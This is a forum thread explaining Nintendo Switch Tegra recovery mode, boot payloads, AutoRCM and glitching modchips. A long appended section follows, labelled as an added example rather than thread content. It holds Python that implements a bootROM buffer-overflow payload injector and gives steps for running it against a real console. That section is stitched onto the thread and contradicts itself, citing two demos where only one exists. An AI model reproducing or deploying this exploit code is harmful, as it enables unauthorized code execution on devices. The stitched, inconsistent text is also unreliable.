About payloads?

MrFromthedepths4
So I’m curious about the RCM, but I’m not entirely sure what payloads do and how to use them. I can’t seem to find any actual details on what it does. Does it work like an Action Replay/GameShark for games? Every time I see something about the RCM loader they briefly mention payloads and they never talk about what it does.
 

thesjaakspoiler
RCM is the ReCovery Mode for Tegra chips.
The Tegra boots from a small program inside the Tegra and has a number of boot options.
Usually the Tegra boots from the eMMC (NAND flash memory chip), but in case that gets corrupted, Tegra chips have a feature where they can boot from a bootloader sent over the USB port as well.
That USB boot mode is not enabled by default.
To activate booting from USB, one pin from the Joy-Con connector needs to be connected to ground and you need to push down the volume - button.
That signals the Tegra to wait for a boot program to be sent over USB.
This is the 'payload' that people are talking about.
The Tegra reads this payload and executes it.
This, for example, enables the Tegra to repair the eMMC memory or initialize it in the factory.
Nintendo left this standard recovery mode on in the first series of Switches.
Usually this would not be much of a problem, as there are several security features that prevent unofficial bootloaders from starting up the system with system admin rights.
But that is where Nintendo also made another mistake with their security model, and this enabled some smart guys to create their own bootloader and start up the OS that is on the Switch with special rights so they could enable Homebrew apps.
In later models, Nintendo fixed the security model, and although you can still inject your own bootloader, it is not possible to start up the operating system on the Switch with privileged rights.
Only with a hardware modchip from SX can you bypass this fix from Nintendo.
The SX modchip is pretty complex and uses voltage glitching to gain access to the security model of the Switch.
This idea came from the PS Vita, and Yifan Lu wrote a whole scientific paper on it.
https://yifan.lu/2019/01/10/injecting-software-vulnerabilities-with-voltage-glitching/
Soon after this paper, the SX modchip appeared on the scene.

With AutoRCM, the booting process is purposely corrupted, forcing the Tegra to boot with a USB payload.
With this hack, you won't need to ground that Joy-Con pin or hold the volume button.
You can just inject the payload through USB.
That saves one step in the process.
 

Draxzelex
So I’m curious about the RCM, but I’m not entirely sure what payloads do and how to use them. I can’t seem to find any actual details on what it does. Does it work like an Action Replay/GameShark for games? Every time I see something about the RCM loader they briefly mention payloads and they never talk about what it does.
Payloads cause a buffer overflow, which inadvertently causes the console to read any code afterwards as legitimate, allowing users to fully exploit the console.
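The two answers above describe the same mechanism from two sides: thesjaakspoiler's post explains that a "payload" is just a boot program the Tegra's bootROM accepts over USB while sitting in RCM, and Draxzelex's post names the buffer overflow that lets an unsigned payload run on early units. The following Python is an added example, not code from this thread or from any launcher project, that models the host side of that exchange: it wraps a bootloader blob in an RCM message, streams it to the device in 0x1000-byte transfers, keeps track of which of the bootROM's two DMA buffers the last transfer landed in, and then issues the oversized GET_STATUS control request that overruns the stack on an unpatched Tegra X1. The numeric constants (NVIDIA vendor/product ID, 680-byte header, 0x30298 maximum length, 0x1000 buffer size, 0x7000 request length) are those documented by the public fusée-gelée research; the assumption that the bootROM starts on the low buffer and alternates after every chunk mirrors the public launcher's bookkeeping and should be checked against it before use on hardware. The transport is abstracted and a recording fake is supplied, so the flow runs offline; the device ID and the payload bytes in the demo are constructed stand-ins, and no first-stage relocation stub (the part that turns the smashed stack into a clean jump to the payload) is included.

```python
"""Host-side model of Tegra RCM payload delivery (added example, not from the thread)."""
import struct

NVIDIA_VID = 0x0955
RCM_PID = 0x7321            # a Tegra waiting in RCM enumerates as "APX"
RCM_HEADER_SIZE = 680       # T210 RCM message header; the body lands at RCM_PAYLOAD_ADDR
RCM_PAYLOAD_ADDR = 0x40010000
RCM_MAX_LENGTH = 0x30298    # largest declared length the bootROM accepts
CHUNK_SIZE = 0x1000         # size of each of the two DMA buffers the bootROM alternates
LOW_BUFFER, HIGH_BUFFER = 0, 1
OVERFLOW_WLENGTH = 0x7000   # oversized GET_STATUS length that reaches the stack


def build_rcm_image(payload: bytes) -> bytes:
    """Wrap a raw bootloader blob in an RCM message.

    The bootROM reads a 4-byte little-endian length, the rest of the header,
    then streams the body to RCM_PAYLOAD_ADDR.  The declared length is the
    maximum so the bootROM stays in its receive loop after the real data has
    arrived, and the image is padded to whole CHUNK_SIZE transfers so no short
    packet ends that loop early.
    """
    if RCM_HEADER_SIZE + len(payload) > RCM_MAX_LENGTH:
        raise ValueError("payload too large for one RCM message")
    header = struct.pack("<I", RCM_MAX_LENGTH).ljust(RCM_HEADER_SIZE, b"\0")
    image = header + payload
    return image + b"\0" * (-len(image) % CHUNK_SIZE)


class RcmSession:
    """Drives a transport exposing read(n), write(data) and control(...)."""

    def __init__(self, transport):
        self.transport = transport
        # Assumption (mirrors the public launcher's bookkeeping): the bootROM
        # starts on the low buffer and switches after every CHUNK_SIZE transfer.
        self.current_buffer = LOW_BUFFER

    def handshake(self) -> bytes:
        # The bootROM sends its 16-byte device ID first; the host must read it.
        return self.transport.read(16)

    def send_image(self, image: bytes) -> int:
        if len(image) % CHUNK_SIZE:
            raise ValueError("image must be a multiple of CHUNK_SIZE")
        for offset in range(0, len(image), CHUNK_SIZE):
            self.transport.write(image[offset:offset + CHUNK_SIZE])
            self.current_buffer ^= 1
        return len(image) // CHUNK_SIZE

    def ensure_high_buffer(self) -> bool:
        """Send one padding chunk if the bootROM is not on the high buffer.

        The oversized copy only reaches the stack from the high buffer, so an
        image that ended on the low buffer needs one more transfer first.
        """
        if self.current_buffer == HIGH_BUFFER:
            return False
        self.transport.write(b"\0" * CHUNK_SIZE)
        self.current_buffer ^= 1
        return True

    def trigger_overflow(self):
        # GET_STATUS (bRequest 0) addressed to an endpoint (bmRequestType 0x82)
        # with an oversized wLength: the unpatched bootROM copies that many bytes
        # out of its DMA buffer and overruns the stack.  A patched unit is unaffected.
        return self.transport.control(0x82, 0x00, 0, 0, OVERFLOW_WLENGTH)

    def inject(self, payload: bytes) -> dict:
        device_id = self.handshake()
        image = build_rcm_image(payload)
        chunks = self.send_image(image)
        padded = self.ensure_high_buffer()
        self.trigger_overflow()
        return {"device_id": device_id, "chunks": chunks + padded, "image_len": len(image)}


class FakeTransport:
    """Records traffic instead of talking to hardware, so the flow runs offline."""

    def __init__(self, device_id: bytes = b"\x01" * 16):  # constructed device ID
        self.device_id = device_id
        self.writes = []
        self.controls = []

    def read(self, n):
        return self.device_id[:n]

    def write(self, data):
        self.writes.append(bytes(data))
        return len(data)

    def control(self, bmRequestType, bRequest, wValue, wIndex, wLength):
        self.controls.append((bmRequestType, bRequest, wValue, wIndex, wLength))
        return b""  # a real device answers with up to wLength bytes


if __name__ == "__main__":
    fake = FakeTransport()
    # Constructed stand-in for a bootloader blob; exactly one DMA buffer long.
    result = RcmSession(fake).inject(b"\xaa" * CHUNK_SIZE)
    print(result, len(fake.writes), fake.controls)
```

To run this against a console, replace `FakeTransport` with a thin adapter around a pyusb device found with `usb.core.find(idVendor=NVIDIA_VID, idProduct=RCM_PID)`, mapping `read`/`write` to the device's bulk endpoints and `control` to `ctrl_transfer`. Note that the `chunks` count differs between the two demo sizes in the module: a body that ends on the low buffer costs one extra padding transfer before the trigger, which is the edge case that silently breaks hand-rolled launchers.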
 
